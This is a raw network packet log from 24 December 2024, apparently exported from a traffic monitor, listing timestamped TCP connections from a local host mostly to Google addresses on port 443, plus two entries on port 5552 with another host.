                                                                                                                                Dec 24, 2024 18:20:57.178286076 CET44349867142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:57.178342104 CET49867443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:57.180628061 CET44349868142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:57.180692911 CET49868443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:57.181263924 CET44349868142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:57.181318045 CET49868443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:57.181433916 CET49867443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:57.181453943 CET44349867142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:57.181747913 CET44349867142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:57.181809902 CET49867443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:57.182307959 CET49867443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:57.183177948 CET49868443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:57.183197021 CET44349868142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:57.183424950 CET44349868142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:57.183475018 CET49868443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:57.183938980 CET49868443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:57.227336884 CET44349867142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:57.231338024 CET44349868142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.085510015 CET44349868142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.085686922 CET49868443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.085688114 CET49868443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.085748911 CET44349868142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.085788965 CET44349868142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.085824013 CET49868443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.086429119 CET49873443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.086458921 CET44349873142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.086489916 CET49868443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.086553097 CET49873443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.087068081 CET49873443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.087078094 CET44349873142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.088548899 CET49874443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:58.088659048 CET44349874142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.088882923 CET49874443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:58.088968992 CET49874443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:58.089009047 CET44349874142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.092000008 CET44349867142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.092345953 CET49867443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.092382908 CET44349867142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.092531919 CET49867443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.092531919 CET49867443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.092587948 CET44349867142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.092715025 CET44349867142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.092744112 CET49867443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.092921019 CET49867443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.093255997 CET49875443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:58.093281984 CET44349875142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.093719006 CET49876443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.093745947 CET44349876142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.093780994 CET49875443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:58.093858004 CET49876443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.094099998 CET49876443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:58.094110966 CET44349876142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.094125986 CET49875443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:58.094134092 CET44349875142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.443180084 CET555249801172.111.138.100192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:58.490268946 CET498015552192.168.2.4172.111.138.100
                                                                                                                                Dec 24, 2024 18:20:59.792954922 CET44349873142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.793025970 CET49873443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.793674946 CET44349873142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.793731928 CET49873443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.794955015 CET44349874142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.795036077 CET49874443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:59.797132015 CET49873443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.797141075 CET44349873142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.797364950 CET44349873142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.797472000 CET49873443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.797796011 CET49874443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:59.797831059 CET44349874142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.798038006 CET49873443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.798078060 CET44349874142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.798131943 CET49874443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:59.798413038 CET49874443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:59.811733007 CET44349876142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.811830044 CET49876443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.812372923 CET44349876142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.812431097 CET49876443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.816807032 CET49876443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.816817045 CET44349876142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.817018032 CET44349876142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.817210913 CET44349875142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.817307949 CET49875443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:59.817359924 CET49876443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.818070889 CET49876443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:59.822639942 CET49875443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:59.822644949 CET44349875142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.822964907 CET44349875142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.823024988 CET49875443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:59.824379921 CET49875443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:59.843331099 CET44349873142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.843338966 CET44349874142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.655235052 CET49899443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.656914949 CET44349898142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.656961918 CET44349898142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.657058001 CET44349898142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.657097101 CET49898443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.657131910 CET49898443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.657587051 CET49898443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.657608986 CET44349898142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.657963991 CET49916443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.657988071 CET44349916142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.658274889 CET44349899142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.658356905 CET49916443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.658359051 CET49899443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.658387899 CET44349899142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.658441067 CET44349899142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.658540010 CET49916443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.658555031 CET44349916142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.658590078 CET49899443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.658590078 CET49899443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.658881903 CET49917443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.658906937 CET49899443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.658910990 CET44349917142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.659152985 CET49917443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.659310102 CET49917443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.659323931 CET44349917142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.896717072 CET49909443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:06.896749973 CET49916443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.896749973 CET49908443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:06.896797895 CET49917443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:06.897221088 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:06.897284985 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.897577047 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:06.898472071 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:06.898505926 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.899127960 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:06.899174929 CET44349919142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:06.899307966 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:06.900130033 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:06.900142908 CET44349919142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.586420059 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.586529970 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.587161064 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.587260962 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.593003988 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.593048096 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.593267918 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.593400002 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.597002029 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.606147051 CET44349919142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.606617928 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.608899117 CET44349919142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.608995914 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.610447884 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.610457897 CET44349919142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.610945940 CET44349919142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.611046076 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.611371040 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:08.639349937 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:08.659332037 CET44349919142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.510288000 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.510356903 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.510605097 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.510618925 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.510649920 CET44349918142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.510654926 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.510715961 CET49918443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.511245012 CET49927443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.511290073 CET44349927142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.511357069 CET49927443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.511887074 CET49927443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.511899948 CET44349927142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.513763905 CET49928443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:09.513796091 CET44349928142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.513884068 CET49928443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:09.514328003 CET49928443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:09.514343977 CET44349928142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.515891075 CET44349919142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.515976906 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.516028881 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.516093016 CET44349919142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.516153097 CET49919443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.516495943 CET49929443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:09.516577005 CET49930443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.516603947 CET44349930142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.516604900 CET44349929142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.516678095 CET49930443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.516680002 CET49929443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:09.516944885 CET49930443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:09.516957998 CET44349930142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.517155886 CET49929443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:09.517191887 CET44349929142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:10.898150921 CET49927443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:10.898189068 CET49928443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:10.898190022 CET49930443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:10.898250103 CET49929443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:10.900420904 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:10.900432110 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:10.900578022 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:10.900876999 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:10.900887966 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:10.901580095 CET49938443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:10.901691914 CET44349938142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:10.903814077 CET49938443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:10.904092073 CET49938443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:10.904133081 CET44349938142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.592771053 CET44349938142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.592863083 CET49938443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.593533993 CET44349938142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.593763113 CET49938443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.597728968 CET49938443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.597774029 CET44349938142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.597790003 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.598026991 CET44349938142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.598093033 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.598121881 CET49938443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.598788977 CET49938443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.598869085 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.599107027 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.604275942 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.604289055 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.604931116 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.605031013 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.606777906 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:12.639380932 CET44349938142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:12.651339054 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:13.522456884 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:13.522547007 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:13.522562981 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:13.522634983 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:13.525928020 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:13.526032925 CET44349937142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:13.526092052 CET49937443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:13.526534081 CET49947443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:13.526565075 CET44349947142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:13.526617050 CET49947443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:13.526896000 CET49948443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:13.526945114 CET44349948142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:13.527004957 CET49948443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:13.527350903 CET49948443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:13.527368069 CET44349948142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:13.528455973 CET49947443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:23.291372061 CET44349988142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:23.291382074 CET44349986142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.132083893 CET44349988142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.132158041 CET44349988142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.132184029 CET49988443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.132371902 CET49988443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.132703066 CET49988443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.132735968 CET44349988142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.133503914 CET49996443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.133596897 CET44349996142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.133747101 CET49996443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.134239912 CET44349985142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.134283066 CET49996443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.134318113 CET44349996142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.134432077 CET49985443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.134432077 CET49985443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.134660959 CET44349985142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.134804010 CET44349985142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.134871006 CET49985443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.134871006 CET49985443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.135731936 CET49997443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.135762930 CET44349997142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.135828018 CET49997443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.136251926 CET49997443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.136276007 CET44349997142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.170084000 CET44349986142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.170126915 CET44349986142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.170213938 CET49986443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.170223951 CET44349986142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.171979904 CET49986443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.171979904 CET49986443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.172399998 CET49998443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.172449112 CET44349998142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.172524929 CET49998443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.172702074 CET49998443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.172727108 CET44349998142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.414948940 CET44349987142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.414993048 CET44349987142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.415018082 CET49987443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.415031910 CET44349987142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.415043116 CET49987443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.415141106 CET49987443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.415656090 CET49987443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.415697098 CET44349987142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.415819883 CET44349987142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.415894032 CET49987443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.415894032 CET49987443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.416161060 CET50002443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.416222095 CET44350002142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.416347027 CET50002443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.416486025 CET50002443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.416501045 CET44350002142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.474657059 CET49986443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.474689960 CET44349986142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.646696091 CET49996443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.646775007 CET49997443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.646802902 CET50002443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.646814108 CET49998443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:24.648212910 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.648216963 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.648243904 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.648303032 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.648497105 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.648555994 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.649003983 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.649017096 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:24.649156094 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:24.649202108 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.352510929 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.352610111 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.353162050 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.353240967 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.353259087 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.353420973 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.354233027 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.354302883 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.356802940 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.356832981 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.357079029 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.357153893 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.357696056 CET50005443192.168.2.4142.250.181.14
